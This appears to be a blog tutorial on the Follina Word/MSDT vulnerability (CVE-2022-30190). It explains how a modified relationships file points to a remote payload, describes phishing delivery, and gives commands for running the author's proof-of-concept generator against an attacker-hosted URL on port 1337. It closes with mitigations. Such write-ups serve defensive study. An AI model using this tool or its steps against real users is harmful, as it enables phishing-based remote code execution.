CVE-2022-30190 AKA Folina, is a zero-day found in Microsoft Products that allows a remote attacker to run malicious code on the endpoint. This vulnerability exists in the Windows Support Diagnostic Tool and can be exploited with any application that supports the invoking of URL protocol.
I however, will be specifically taking a look at exploiting this with the help of MS Office files as phishing is the most common way that attackers try to get into the system. I have also put together a mini proof of concept that makes testing this in your environment way easier! Let's setup an environment and take a look at how the exploit works in detail.
A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
-Microsoft Security Response Center
How It Works
It all begins with the malicious word document. All office documents are basically packed files. anyone can unpack then with the
Doing so reveals files that are contained within a word document. The specific file in question here is
document.xml.rels is an XML file that maps relationships within the document (image holders/tables/fonts) to external resources (images hosted online/videos). The exploit makes use of this functionality.
The attacker first unpacks a word document as shown in the previous step, modifies the target to point to his web server hosting the malicious payload as shown above and repacks the word file.
Shown above is the payload hosted on a remote server. Initially researchers found out that the MSTD tool requires a pin to run any code and therefore people thought this exploit would not be possible. However a researcher found out that given that the payload hosted on the remote server be more than 4096 bytes, MSTD will continue to run arbitrary code giving any attacker Remote Code Execution. Another researcher by the name of Bill Demirkapi has written an in-depth piece explaining how and why the number 4096. Now that we have taken a look at how the exploit works, let's see it in action!
- Windows 10/11 virtual machine
- Office Deployment Tool (download and install it on the VM)
Installing Office 2021 Enterprise
C:\Users\User>setup.exe /configure configuration-Office2021Enterprise.xml
That's all for the setup!
To make things easier, I wrote up a proof-of-concept in regards to this vulnerability. Here's how it works:
Clone the POC
git clone https://github.com/ItsNee/Folina-CVE-2022-30190-POC.git cd Folina-CVE-2022-30190-POC
python3 folina.py --payload-url "http://192.168.200.144:1337/pwn.html"
Running this will create a malicious word document with the given
--payload-url parameter and host the default payload on port
1337 on all interfaces of the machine that the tool is run on.
Deliver Malicious File
Deliver the malicious word document created by the script to your end point. From the attackers POV this could be via a phishing email of some sort.
Once the user the user executes the file, your web server hosting the payload will receive all a callback and the calculator application will remotely be opened on the endpoint without any other action.
Microsoft and some other security researchers have released some workarounds that have shown to work against this exploit.
On top of all this, Microsoft Defender has also started to detect and protect against this actively. There might still be bypasses out in the wild! beware. Disable the MSDT URL if you can afford it!
Hope you found this insightful!!